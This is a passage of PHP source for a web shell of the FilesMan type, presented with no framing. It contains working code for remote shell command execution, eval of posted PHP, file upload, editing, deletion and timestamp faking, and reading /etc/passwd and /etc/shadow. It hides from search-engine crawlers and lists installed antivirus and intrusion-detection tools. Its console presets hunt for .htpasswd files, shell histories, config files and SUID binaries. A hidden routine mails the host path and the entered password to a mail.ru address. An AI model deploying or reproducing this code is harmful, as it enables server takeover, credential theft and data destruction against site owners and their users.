"g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=ne value=''> <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $â = ''; if (function_exists('exec')) { @exec($in,$â); $â = @join("\n",$â); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $â = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $â = ob_get_clean(); } elseif (function_exists('shell_exec')) { $â = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $â = ""; while(!@feof($f)) $â .= fread($f,1024); pclose($f); }else return "â³ Unable to execute command\n"; return ($â==''?"â³ Query did not return anything\n":$â); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; if(array_key_exists('pff',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); } function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; else return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex('which ' . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $â) if(which($â)) $temp[] = $â; showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $â) if(which($â)) $temp[] = $â; showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $â) if(which($â)) $temp[] = $â; showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('HDD space', ex('df -h')); showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); } echo '</div>'; hardFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } hardHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; hardFooter(); } if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo "<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } </script>"; echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; echo '</form></div><script>d.cf.cmd.focus();</script>'; hardFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } hardHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div><br>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($â = readdir($dh) ) !== false) { $â = $path.$â; if ( (basename($â) == "..") || (basename($â) == ".") ) continue; $type = filetype($â); if ($type == "dir") deleteDir($â); else @unlink($â); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7> <input type=hidden name=ne value=''> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; echo "<option value='tar'>+ tar.gz</option>"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>â³ Paste</option>"; echo "</select> "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; hardFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 